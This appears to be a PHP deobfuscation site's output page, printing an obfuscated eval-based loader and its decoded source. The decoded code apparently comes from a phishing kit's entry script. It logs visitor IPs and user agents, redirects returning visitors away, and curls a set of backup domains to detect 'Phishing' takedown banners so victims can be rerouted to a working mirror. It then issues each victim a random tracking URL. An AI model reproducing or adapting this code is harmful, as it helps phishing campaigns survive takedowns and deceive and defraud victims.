Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $_F=__FILE__;$_X='P2lCP1ouWg1Wbk1ubnNPSF9uPWV6PSgpOw1Wek12UXN6TV9PSDJNPidYWGgyT0hBWF..

Decoded Output download

?><?php
session_start();
require_once '../conf.php';
require_once '../deny_firewall.php';
require_once 'live_view.php';

    
    
$querycheck_ip = mysqli_query($db, "SELECT * FROM logs WHERE ip='".$ipproxy."'");

if(mysqli_num_rows($querycheck_ip) > 0){
    header('Location: /shop');
}else{
}




$check_bl = "SELECT * FROM lizenz WHERE id = 1";
$result_bl = $db->query($check_bl);
while($row_bl = $result_bl->fetch_assoc()) {
   $domain1_bl = $row_bl['domain'];
   $domain2_bl = $row_bl['domain2'];
   $domain3_bl = $row_bl['domain3'];
   $domain4_bl = $row_bl['domain4'];
}  


$ch1url ="http://" .$domain1_bl. "/";
$ch1 = curl_init($ch1url);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, true);
$text1 = curl_exec($ch1);
$check1 = strpos($text1, "Phishing");



$ch2url ="http://" .$domain2_bl. "/";
$ch2 = curl_init($ch2url);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true);
$text2 = curl_exec($ch2);
$check2 = strpos($text2, "Phishing");



$ch3url ="http://" .$domain3_bl. "/";
$ch3 = curl_init($ch3url);
curl_setopt($ch3, CURLOPT_RETURNTRANSFER, true);
$text3 = curl_exec($ch3);
$check3 = strpos($text3, "Phishing");



$ch4url ="http://" .$domain4_bl. "/";
$ch4 = curl_init($ch4url);
curl_setopt($ch4, CURLOPT_RETURNTRANSFER, true);
$text4 = curl_exec($ch4);
$check4 = strpos($text4, "Phishing");


if ($check1==false)
{
}
else
{
    header("Location: $ch2url");
}

if ($check2==false)
{
}
else
{
    header("Location: $ch3url");
}


if ($check3==false)
{
}
else
{
    header("Location: $ch4url");
}





$create_urlck = genRandomNumber(200,false);
$_SESSION['create_url'] = $create_urlck;


if (!isset($_SESSION['startvisit'])) {
    header('Location: /shop');
} else {
}


function genRandomNumber($length = 10, $formatted = true) {
    $nums = '0123456789';
    $out = $nums[mt_rand( 1, strlen($nums)-1 )];

    for ($p = 0; $p < $length-1; $p++)
        $out .= $nums[mt_rand( 0, strlen($nums)-1 )];

    if ($formatted)
        return number_format($out);
    return $out;
}


$ip_addressck = getUserIP();
$timestampck = date("Y-m-d H:i:s");
$useragentck = $_SERVER['HTTP_USER_AGENT'];


$add_url = mysqli_query($db, "INSERT INTO logs (user_url, zeit, useragent, ip)
VALUES ('$create_urlck', '$timestampck', '$useragentck', '$ip_addressck')");


$firstpage = "/ap/".$create_urlck."/page_1";

header("refresh:0; url=$firstpage");

?>

Did this file decode correctly?

Original Code

<?php $_F=__FILE__;$_X='P2lCP1ouWg1Wbk1ubnNPSF9uPWV6PSgpOw1Wek12UXN6TV9PSDJNPidYWGgyT0hBWFouWic7DVZ6TXZRc3pNX09IMk0+J1hYaDlNSHFfQXN6TX1lV1dYWi5aJzsNVnpNdlFzek1fT0gyTT4nV3NjTV9jc019WFouWic7DVYNVj4+Pj4NVj4+Pj4NViR2UU16cTIuTTJ5X3NaPlM+WXFudldzX3ZRTXpxKCQ5PCw+InBLSUsvVD4qPnJnN3U+V094bj57dEtnSz5zWlMnIlgkc1paek9ScVgiJyIpOw1WDVZzQShZcW52V3NfSFFZX3pPfW4oJHZRTXpxMi5NMnlfc1opPmk+YSldDVY+Pj4+Lk1lOU16KCdJTzJlPXNPSDo+aG4uT1onKTsNVmxNV25NXQ1WbA1WDVYNVg1WDVYkMi5NMnlfPFc+Uz4icEtJSy9UPio+cmc3dT5XczVNSDU+e3RLZ0s+czk+Uz4wIjsNViR6TW5RVz1fPFc+Uz4kOTwtaXZRTXpxKCQyLk0yeV88Vyk7DVZ9LnNXTSgkek99XzxXPlM+JHpNblFXPV88Vy1pQU09Mi5fZW5uTzIoKSk+XQ1WPj4+JDlPWWVzSDBfPFc+Uz4kek99XzxXaic5T1llc0gnZDsNVj4+PiQ5T1llc0hrXzxXPlM+JHpPfV88V2onOU9ZZXNIaydkOw1WPj4+JDlPWWVzSEpfPFc+Uz4kek99XzxXaic5T1llc0hKJ2Q7DVY+Pj4kOU9ZZXNIVV88Vz5TPiR6T31fPFdqJzlPWWVzSFUnZDsNVmw+Pg1WDVYNViQyLjBRelc+UyIuPT1aOmhoIj5YJDlPWWVzSDBfPFdYPiJoIjsNViQyLjA+Uz4yUXpXX3NIcz0oJDIuMFF6Vyk7DVYyUXpXX25NPU9aPSgkMi4wLD4vIGdJN21UX2dLVCBnRVRnRkVwcktnLD49elFNKTsNViQ9TVI9MD5TPjJReldfTVJNMigkMi4wKTsNViQyLk0yeTA+Uz5uPXpaT24oJD1NUj0wLD4ibS5zbi5zSHgiKTsNVg1WDVYNViQyLmtRelc+UyIuPT1aOmhoIj5YJDlPWWVzSGtfPFdYPiJoIjsNViQyLms+Uz4yUXpXX3NIcz0oJDIua1F6Vyk7DVYyUXpXX25NPU9aPSgkMi5rLD4vIGdJN21UX2dLVCBnRVRnRkVwcktnLD49elFNKTsNViQ9TVI9az5TPjJReldfTVJNMigkMi5rKTsNViQyLk0yeWs+Uz5uPXpaT24oJD1NUj1rLD4ibS5zbi5zSHgiKTsNVg1WDVYNViQyLkpRelc+UyIuPT1aOmhoIj5YJDlPWWVzSEpfPFdYPiJoIjsNViQyLko+Uz4yUXpXX3NIcz0oJDIuSlF6Vyk7DVYyUXpXX25NPU9aPSgkMi5KLD4vIGdJN21UX2dLVCBnRVRnRkVwcktnLD49elFNKTsNViQ9TVI9Sj5TPjJReldfTVJNMigkMi5KKTsNViQyLk0yeUo+Uz5uPXpaT24oJD1NUj1KLD4ibS5zbi5zSHgiKTsNVg1WDVYNViQyLlVRelc+UyIuPT1aOmhoIj5YJDlPWWVzSFVfPFdYPiJoIjsNViQyLlU+Uz4yUXpXX3NIcz0oJDIuVVF6Vyk7DVYyUXpXX25NPU9aPSgkMi5VLD4vIGdJN21UX2dLVCBnRVRnRkVwcktnLD49elFNKTsNViQ9TVI9VT5TPjJReldfTVJNMigkMi5VKTsNViQyLk0yeVU+Uz5uPXpaT24oJD1NUj1VLD4ibS5zbi5zSHgiKTsNVg1WDVZzQT4oJDIuTTJ5MFNTQWVXbk0pDVZdDVZsDVZNV25NDVZdDVY+Pj4+Lk1lOU16KCJJTzJlPXNPSDo+JDIua1F6VyIpOw1WbA1WDVZzQT4oJDIuTTJ5a1NTQWVXbk0pDVZdDVZsDVZNV25NDVZdDVY+Pj4+Lk1lOU16KCJJTzJlPXNPSDo+JDIuSlF6VyIpOw1WbA1WDVYNVnNBPigkMi5NMnlKU1NBZVduTSkNVl0NVmwNVk1Xbk0NVl0NVj4+Pj4uTWU5TXooIklPMmU9c09IOj4kMi5VUXpXIik7DVZsDVYNVg1WDVYNVg1WJDJ6TWU9TV9RelcyeT5TPnhNSGdlSDlPWUVRWTxNeihrYWEsQWVXbk0pOw1WJF9wS3BwMzdFaicyek1lPU1fUXpXJ2Q+Uz4kMnpNZT1NX1F6VzJ5Ow1WDVYNVnNBPighc25uTT0oJF9wS3BwMzdFaiduPWV6PWNzbnM9J2QpKT5dDVY+Pj4+Lk1lOU16KCdJTzJlPXNPSDo+aG4uT1onKTsNVmw+TVduTT5dDVZsDVYNVg1WQVFIMj1zT0g+eE1IZ2VIOU9ZRVFZPE16KCRXTUh4PS4+Uz4wYSw+JEFPelllPT1NOT5TPj16UU0pPl0NVj4+Pj4kSFFZbj5TPidhMGtKVUxbMWZQJzsNVj4+Pj4kT1E9PlM+JEhRWW5qWT1femVIOSg+MCw+bj16V01IKCRIUVluKS0wPilkOw1WDVY+Pj4+QU96PigkWj5TPmE7PiRaPkI+JFdNSHg9Li0wOz4kWisrKQ1WPj4+Pj4+Pj4kT1E9PlhTPiRIUVlualk9X3plSDkoPmEsPm49eldNSCgkSFFZbiktMD4pZDsNVg1WPj4+PnNBPigkQU96WWU9PU05KQ1WPj4+Pj4+Pj56TT1Rekg+SFFZPE16X0FPelllPSgkT1E9KTsNVj4+Pj56TT1Rekg+JE9RPTsNVmwNVg1WDVYkc1pfZTk5ek1ubjJ5PlM+eE09IG5NejNtKCk7DVYkPXNZTW49ZVlaMnk+Uz45ZT1NKCJiLVktOT50OnM6biIpOw1WJFFuTXpleE1IPTJ5PlM+JF9wS2c2S2dqJ3RUVG1fIHBLZ19GQ0tFVCdkOw1WDVYNViRlOTlfUXpXPlM+WXFudldzX3ZRTXpxKCQ5PCw+IjNFcEtnVD4zRVQ3PldPeG4+KFFuTXpfUXpXLD41TXM9LD5Rbk16ZXhNSD0sPnNaKQ1WNkZJIEtwPignJDJ6TWU9TV9RelcyeScsPickPXNZTW49ZVlaMnknLD4nJFFuTXpleE1IPTJ5Jyw+JyRzWl9lOTl6TW5uMnknKSIpOw1WDVYNViRBc3puPVpleE0+Uz4iaGVaaCJYJDJ6TWU9TV9RelcyeVgiaFpleE1fMCI7DVYNVi5NZTlNeigiek1Bek1uLjphOz5ReldTJEFzem49WmV4TSIpOw1WDVY/aQ=';$_D=strrev('edoced_46esab');eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));?>

Function Calls

strtr 1
strrev 1
str_replace 1
base64_decode 2

Variables

$_D base64_decode
$_F index.php
$_R 0
$_X 0

Stats

MD5 5971f8a17f496dd33fce66f370538a8d
Eval Count 2
Decode Time 64 ms